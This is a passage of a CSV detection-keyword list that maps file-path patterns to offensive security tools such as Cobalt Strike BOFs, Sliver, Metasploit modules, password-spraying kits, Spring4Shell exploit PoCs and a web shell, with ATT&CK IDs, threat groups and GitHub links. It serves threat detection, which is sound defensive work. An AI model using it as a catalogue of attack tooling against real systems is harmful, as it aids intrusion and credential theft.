TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/socks-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/socks-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/spacerunner.exe*,greyware_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/SpaceRunner.git*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*/SpamChannel.git*,offensive_tool_keyword,SpamChannel,poof emails from any of the +2 Million domains using MailChannels,T1566 - T1566.001,TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/SpamChannel,1,1,N/A,8,3,256,28,2023-09-21T12:25:03Z,2022-12-20T21:31:55Z -*/spawn.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,1,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -*/spellbound.git*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*/spellgen.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*/spellstager.py *,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*/spider.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/SpiderFoot-*.log.cs*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/SpiderFoot.csv*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/spiderfoot.git*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*/SpiderMate/Jatayu*,offensive_tool_keyword,Jatayu,Stealthy Stand Alone PHP Web Shell,T1071,TA0005,N/A,N/A,Shell spawning,https://github.com/SpiderMate/Jatayu,1,1,N/A,N/A,1,31,8,2019-09-12T17:03:13Z,2019-09-12T09:04:10Z -*/splunk_whisperer.git*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*/SplunkWhisperer2.git*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - 
TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*/spoof/dns*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/spoof/mdns*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/spoof/spoof_windows.*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/SpookFlare.git*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/spoolsystem/SpoolTrigger/*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/spray/spray.py*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*/Spray365*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*/Spray-AD.*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*/SprayAD.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*/Spray-AD/*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*/sprayers/owa.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against 
Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/sprayhound.git*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*/sprayhound/*.py*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*/spraying.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/SprayingToolkit*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/SprayingToolkit.git*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/Spring4Shell-POC*,offensive_tool_keyword,Spring4Shell,Spring4Shell Proof Of Concept/Information CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BobTheShoplifter/Spring4Shell-POC,1,1,N/A,N/A,4,335,106,2022-11-09T15:46:06Z,2022-03-30T07:54:45Z -*/Spring4Shell-POC*,offensive_tool_keyword,Spring4Shell,Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/reznok/Spring4Shell-POC,1,1,N/A,N/A,4,303,229,2022-08-04T18:26:18Z,2022-03-31T00:24:28Z -*/SpringCore0day*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,1,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*/spring-core-rce*,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,1,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*/Spring-CVE/*,offensive_tool_keyword,POC,POC exploit for CVE-2022-22963,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/kh4sh3i/Spring-CVE,1,1,N/A,N/A,1,13,7,2022-03-31T20:58:54Z,2022-03-31T20:19:51Z -*/SpringFramework_CVE-2022-22965_RCE*,offensive_tool_keyword,POC,SpringFramework CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation 
tools,https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE,1,0,N/A,N/A,1,76,17,2022-04-01T12:08:45Z,2022-04-01T04:51:44Z -*/springshell-rce-poc*,offensive_tool_keyword,Spring4Shell,CVE-2022-22965 - CVE-2010-1622 redux,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DDuarte/springshell-rce-poc,1,1,N/A,N/A,1,21,12,2023-04-18T14:15:42Z,2022-03-31T08:06:46Z -*/sql_inj.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/sqli.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/sqli/mssqli*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/mysqli*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/postgresqli*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/sqlitei*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/utils*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli_test.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Sqlmap*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*/sqlmap.zip*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*/SQLRecon*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,1,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*/sqrtZeroKnowledge/CVE-*,offensive_tool_keyword,poc,Exploit for the CVE-2023-23398,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY,1,1,N/A,N/A,2,158,46,2023-03-15T17:53:53Z,2023-03-15T17:03:38Z -*/src/exploit.html.tpl*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation 
tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*/src/john.com*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/src/jumbo.c*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/src/jumbo.h*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/src/nysm.c*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/src/RecycledGate.h*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*/src/Sleeper.cpp*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
